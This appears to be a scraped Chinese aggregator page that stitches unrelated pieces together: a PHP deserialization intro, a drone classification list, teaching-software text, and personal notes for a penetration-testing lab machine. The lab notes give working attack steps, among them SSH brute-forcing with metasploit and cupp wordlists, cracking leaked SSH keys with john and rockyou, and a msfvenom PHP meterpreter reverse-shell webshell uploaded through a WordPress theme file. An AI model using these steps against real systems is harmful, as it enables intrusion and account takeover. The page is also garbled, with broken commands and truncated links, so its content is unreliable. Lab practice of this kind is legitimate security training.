这个网站干什么的 什么是PHP反序列化靶机实战

这个网站干什么的 什么是PHP反序列化靶机实战,第1张

在我们讲PHP反序列化的时候,基本都是围绕着serialize(),unserialize()这两个函数。那么什么是序列化呢,序列化说通俗点就是把一个对象变成可以传输的字符串。举个例子,不知道大家知不知道json格式,这就是一种序列化,有可能就是通过array序列化而来的。而反序列化就是把那串可以传输的字符串再变回对象。而反序列化则比较容易出现漏洞。
这么序列化一下然后反序列化,为什么就能产生漏洞了呢?
这个时候,我们就要了解一下PHP里面的魔术方法了,魔法函数一般是以__开头,通常会因为某些条件而触发不用我们手动调用:
在研究反序列化漏洞的时候,如果服务器能够接收我们反序列化过的字符串、并且未经过滤的把其中的变量直接放进这些魔术方法里面的话,就容易造成很严重的漏洞了。
所以这个网站其实希望告诉大家这个反序列化的问题,并提供一些实战练习。

无人机的分类有:

一、按飞行平台构型分类:

无人机可分为固定翼无人机、旋翼无人机、无人飞艇、伞翼无人机、扑翼无人机等。

二、按用途分类:

无人机可分为军用无人机和民用无人机。

1、军用无人机可分为侦察无人机、诱饵无人机、电子对抗无人机、通信中继无人机、无人战斗机以及靶机等。

2、民用无人机可分为巡查/监视无人机、农用无人机、气象无人机、勘探无人机以及测绘无人机等。

三、按尺度分类(民航法规):

无人机可分为微型无人机、轻型无人机、小型无人机以及大型无人机。

四、按活动半径分类:

无人机可分为超近程无人机、近程无人机、短程无人机、中程无人机和远程无人机。

扩展资料

在不断经历着迅速变化的城市中,除了提供物流解决方案,无人机还可以为城市规划、建设和管理提供多方面的基础地理信息以及执法取证,诸如城市道路桥梁建设、交通巡逻、治安监控、城市执法等等。

当我们在进行城市规划的时候,往往需要更为详细的城市土地利用信息,如果人工勘查,工作量非常庞大,而这些有关城市居住用地、道路交通、公共建筑等方面的信息从无人机航摄影像上就可以清晰地判读提取。

从助力现代乡村到给力智慧城市,凡是需要空中解决方案的地方,都将有无人机的一席之地。无人机将应用在更广阔的领域。

参考资料:

百度百科词条-无人机(无人驾驶飞机)

本人笔记,仅供参考

相关靶机:

链接:>

提取码:qd32

渗透分析:

对于开启ssh服务的22端口的靶场优先考虑

1暴力破解

2私钥泄露

对于开放>

1通过浏览器访问对应靶场>

2使用探测工具对>

挖掘敏感信息:

使用浏览器对靶场IP的>

尤其对robotstxt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);

对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;

-- nikto -host靶场IP地址

特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;

登录服务器之后,我们需要做以下 *** 作。

1、查看当前用户whoami 

2、id 查看当前用户的权限

3、查看根目录寻找flag文件

如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一

般情况下,flag文件只属于root用户和对应的用户组:

cat /etc/passwd查看所有用户的列装

cat /etc/group查看用户组

find / -user用户名查看属于某些用户的文件

/tmp查看缓冲文件目录

深入挖掘

通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务

cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。

如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反dshell,然后netcat执行监听获取对应用户的权限。

如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。

万不得已的时候只能对ssh服务进行暴力破解。破解最后一个

用户名。破解工具如hydra、medusa等;

利用cupp创建字典

git clone >

chmod +x cupppy

/cupppy -i以交互的方式创建字典

输入用户名然后一直回车到Do you want to add some random numbers at the end of words输入yes其他全部no此时创建完成

之后推荐用metasploit破解ssh

在终端中输入

msfconsole

msf > use auxiliary/scaner/ssh/ssh_ login(使用该模块)

set rhosts  19216856103(确定ip地址)

set username 用户名(破解的用户名)

set pass_ file 用户名txt(刚刚创建的字典)

set threads  5(输入线程)

Run(进攻)

此时破解出密码例如123

直接连接,如果出现问题可以重启msfconsole,启用该模块后

set rhosts 19216856103             (连接远程主机)

set username hadi(用户名)

Set password 123(密码)

Run

界面简陋就使用python优化界面

Python -c “import pty;ptyspawn(‘/bin/bash’)”(优化界面)

此时可以把自己权限提升到root:

su - root

回到根目录ls打开flag文件

Ssh秘钥泄露

解密Ssh秘钥信息(以秘钥名id_isa举例)

Chmod  600 id_isa(赋予is_isa可读可写权限)

ssh2john id_isa > isacrack       (就是用ssh2john把秘钥里的东西转换成john可识别的)

Zcat  /usr/share/wordlists/rockyoutxtgz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)

制作webshell

msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw > /root/Desktop/shellphp

启动监听

msf > use exploit/multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp

Weoshell

msf exploit(handler) > set Ihost攻击机IP地址

msf exploit(handler) > set lport 4444

msf exploit(handler)> run

上传Webshell

使用找到的敏感信息登录系统后台,上传webshell。 执行

webshel(访问具有webshell的php页面)

获得反d的shell

--

wordpress上传点theme 404php

执行: >

学资源管理软件的主要功能是对各种教学资源进行采集、管理、检索和利用。(2分);教学资源由两部分组成:CAI软件库和学习资源库。

CAI软件库包括通过各种渠道收集到的国内外的优秀课件,可能是一门完整的课程,也可能是一节课或一个知识点。CAI软件库中的CAI软件应满足学科齐全、内容丰富和形式多样等要求,以适应不同层次、不同学科的教育培训的需要或个别化培训的需要。

学习资源库为各级各类学校提供丰富的学习背景材料、扩展学习材料以及其他各种分类多媒体素材。学习资源库也可用作教师培训备课的参考资料(包括各种史料、教参、优秀教案和优秀课例的分析等)。

系统维护

云设备:云设备中分为控制节点列表和计算节点列表。控制节点中可以查看主机名称、状态,并且可以对控制节点关机 *** 作。计算节点中可以查看主机名称、IP地址以及状态,并对计算节点进行刷新、关机的 *** 作。

云主机:云主机中分为服务器列表和实例两部分。服务器列表中存放的是实验中所有用到的服务器,如靶机,交换机,路由器等。可以完成刷新,重启和重建功能。实例部分是实验中所使用的虚拟机。可以完成刷新,重启,重建和删除功能。

数据 *** 作:主要是对用户 *** 作数据的清除,备份和恢复的功能。

更新数据:当公司新添加了一些实验之后,学校可以通过输入公司提供的IP地址和端口号的方式来更新数据。


>

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zz/12826670.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-28
下一篇 2023-05-28

发表评论

登录后才能评论

评论列表(0条)

保存